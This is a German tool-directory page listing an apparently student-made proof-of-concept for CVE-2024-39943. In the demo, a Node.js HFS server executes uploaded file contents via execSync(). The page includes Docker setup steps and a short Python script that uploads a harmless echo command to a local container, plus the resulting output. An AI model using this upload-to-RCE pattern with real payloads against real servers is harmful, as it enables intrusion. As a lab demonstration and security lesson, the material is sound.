Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Node.js-CVE-2024-39943 — Proof-of-Concept-Exploit für CVE-2024-39943, der die Remote-Code-Ausführung durch Dateiupload in einem Node.js-HFS-Server mittels child_process.execSync() demonstriert. | Kitploit
Tools/GitHubGitHub/jenmrr/node.js-cve-2024-39943
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Proof-of-Concept-Exploit für CVE-2024-39943, der die Remote-Code-Ausführung durch Dateiupload in einem Node.js-HFS-Server mittels child_process.execSync() demonstriert.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Node.js HFS Befehlsausführungsschwachstelle (CVE-2024-39943)

WhiteHat School 3. Generation – Jeongmin Roh (@JenmrR)


Zusammenfassung

In einer Node.js-basierten HFS-Serverumgebung existiert eine Schwachstelle, bei der der Inhalt hochgeladener Dateien mit child_process.execSync() ausgeführt wird.
Ein Angreifer kann über die Datei-Upload-Funktion direkt Betriebssystembefehle ausführen und die Ergebnisse interner Befehle einsehen oder das System steuern.
Dies ist die Schwachstelle CVE-2024-39943, die das gleiche Bedrohungsniveau wie eine Befehlsinjektion (Remote Code Execution) aufweist.


Umgebungskonfiguration und Ausführung

  1. Server über Docker-Umgebung ausführen
  2. Der Server empfängt Datei-Uploads unter dem Pfad /upload und führt den Inhalt der hochgeladenen Dateien direkt als Befehl aus
  3. Der Angreifer kann durch Upload RCE erzielen

Ausführungsablauf

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Ergebnis

Serverantwort nach PoC-Ausführung:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Fazit

  • Diese Schwachstelle ist eine typische RCE (Remote Command Execution)-Schwachstelle, die auftritt, wenn externe Eingaben als Betriebssystembefehle ausgeführt werden.
  • Das direkte Ausführen des Inhalts hochgeladener Dateien mit execSync() stellt ein erhebliches Sicherheitsrisiko dar.
  • Benutzereingaben müssen stets validiert werden und dürfen nicht direkt auf dem Server ausgeführt werden.

Tool herunterladen